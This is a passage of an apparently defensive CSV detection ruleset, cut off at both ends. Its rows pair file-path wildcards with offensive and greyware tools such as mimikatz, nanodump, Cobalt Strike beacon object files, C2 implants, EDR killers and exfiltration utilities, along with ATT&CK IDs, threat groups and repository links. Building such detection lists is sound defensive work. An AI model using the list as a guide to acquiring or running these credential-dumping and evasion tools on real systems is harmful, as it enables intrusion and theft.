- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*\Koh\Koh.*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*\krb5\*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\KRBUACBypass*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*\Ladon.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*\Ladon.ps1*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*\lansearch.exe*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*\LAPSDumper\*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*\ldap_search_bof.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z 
-*\LibSnaffle*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,0,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*\Loader\Loader.csproj*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*\local_admins.csv*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\LocalPrivEsc\*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\LogonScreen.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*\lsass.DMP,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\lsass.dmp*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*\lsass.dmp*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,0,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*\LSASSProtectionBypass\*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*\LsassSilentProcessExit*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*\m3-gen.py*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -*\MaccaroniC2*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,0,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*\macoffe.pdb*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and 
commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\malseclogon.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*\MalStuff.cpp*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*\malware_runner.py*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,0,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*\manspider_*.log*,offensive_tool_keyword,MANSPIDER,Spider 
entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*\master\GPSCoordinates\*,offensive_tool_keyword,GPSCoordinates,Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled,T1018 - T1059.001,TA0001 - TA0002,N/A,N/A,Reconnaissance,https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\Mayhem.psm1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\megatools-*-win64\*,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*\megatools.exe*,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. 
Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,,N/A,,, -*\mem_dll.pdb*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\mhydeath64*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,0,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*\mimi32.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*\mimi64.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*\Mockingjay_BOF.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,0,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*\modifiableautorun.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*\monkey.exe *,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation 
tools,https://github.com/guardicore/monkey,1,0,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*\monkey32.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*\monkey64.exe*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*\Mshikaki.cpp*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,0,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*\MSOL\DomainCompanyInfo.txt*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,0,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*\mystikal.py*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,0,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*\nanodump*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*\net*\ftpagent.exe*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,0,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -"*\net.exe"" accounts*",greyware_tool_keyword,net,Enumerate local accounts,T1087.001 - T1003,TA0007 - TA0009,N/A,N/A,discovery,https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*\net.exe* localgroup admin*,greyware_tool_keyword,net,showing users in a privileged group. ,T1069 - T1003,TA0007 - TA0040,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*\net.exe* sessions*,greyware_tool_keyword,net,List active SMB session,T1135 - T1047,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*\net.exe* view */domain*,greyware_tool_keyword,net,display all domain names on the network,T1016 - T1046,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,N/A,N/A,10,N/A,N/A,N/A,N/A -*\net1 sessions*,greyware_tool_keyword,net,List active SMB session,T1135 - T1047,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,10,N/A,N/A,N/A,N/A -*\NetExec-main*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*\NetLoader.exe*,offensive_tool_keyword,NetLoader,Loads any C# 
binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,0,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*\netscan.exe*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*\netscan.exe*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\netscan.lic*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*\netscan.xml*,greyware_tool_keyword,netscan,SoftPerfect Network Scanner abused by threat actor,T1040 - T1046 - T1018,TA0007 - TA0010 - TA0001,N/A,N/A,Network Exploitation tools,https://www.softperfect.com/products/networkscanner/,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*\netscan_linux.tar.gz*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\netscan_portable.zip*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices 
via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\netscan_portable\*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\netscan_setup.exe*,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*\NewPhish.ps1*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*\NimBlackout*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*\NimPlant.*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*\Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 
